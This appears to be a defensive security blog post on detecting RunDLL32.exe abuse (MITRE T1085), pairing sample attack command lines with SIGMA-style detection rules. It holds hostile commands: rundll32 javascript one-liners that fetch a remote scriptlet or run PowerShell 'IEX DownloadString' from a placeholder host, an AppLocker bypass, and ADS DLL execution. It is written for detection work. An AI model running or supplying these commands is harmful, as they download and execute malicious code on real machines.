Launching a strange binary file on a target endpoint is a good way to raise alarm bells within the target organization’s SOC. One of the more common #LOLBINS we see is to use RunDLL32.exe to execute malicious DLL files. This technique is well documented in MITRE’s ATT&CK framework under T1085.
In this post, we look at detection approaches for 4 sub-techniques. In each case the assumption is that you are logging command execution with Sysmon or at least EventID 4688 (process execution with command lines).
Note: Credit for items #1 and #2 goes to the brilliant folks at https://lolbasproject.github.io/lolbas.
SubTechnique 1 – Javascript ActiveX Objects
Executing simple Javascript downloader.
This behavior has been used by malware such as Poweliks.
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"
Executing Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
Using Rundll32.exe to execute a JavaScript script that runs calc.exe. This will bypass AppLocker even if calc.exe is not on the allowed list.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
Executing Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
SIGMA Friendly Detection Logic:
image=rundll32.exe AND commandLine=”*ActiveXObject*” OR commandLine=”*WScript.Shell*” OR commandLine=”*RunHTMLApplication*”
SubTechnique 2 – Alternate data streams
Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
SIGMA Friendly Detection Logic:
image=rundll32.exe | regex commandLine=”/^rundll32.+\:.+\..+$/”
SubTechnique 3 – Point Function Call
RunDll32 can be used to launch an executable via the PointFunctionCall operation. This technique was used by a suspected APT group (APT29).
"C:\Windows\system32\rundll32.exe" C:\Users\Administrator\AppData\Local\cyzfc.dat, PointFunctionCall
SIGMA Friendly Detection Logic:
image=rundll32.exe AND commandLine=”*PointFunctionCall*”
SubTechnique 4 – Network HTTP(s) call for additional payloads
Rundll32 can be used to launch a custom DLL that pulls down malware from the internet. The example below is used by Slimware PUA.
Rundll32.exe "C:\Users\*\AppData\Local\OnlineFormFinderTooltab\TooltabExtension.dll",A -hp=https://hp.myway.com/onlineformfinder/ttab02/index.html -ua="(Windows NT 10.0; Win64; MSIE 11.1747; Build 16299; SP 0)" -ul=https://anx.mindspark.com/anx.gif?anxa=%251&anxe=%252&anxt=CE87BC6F-A080-40BF-8E3B-4EE1C18EDBB7&anxtv=2.7.1.3000&anxp=^CPW^xdm373^TTAB02^us&anxsi=&anxv=%253&anxd=2020-04-01&anxr=%254 -hu=SHOW
SIGMA Friendly Detection Logic:
image=rundll32.exe (commandLine=”*\\users\\*http*.” AND NOT commandLine=*yourdomain.com*)
References:
– https://lolbas-project.github.io/lolbas/Binaries/Rundll32
– https://attack.mitre.org/techniques/T1085/
– https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html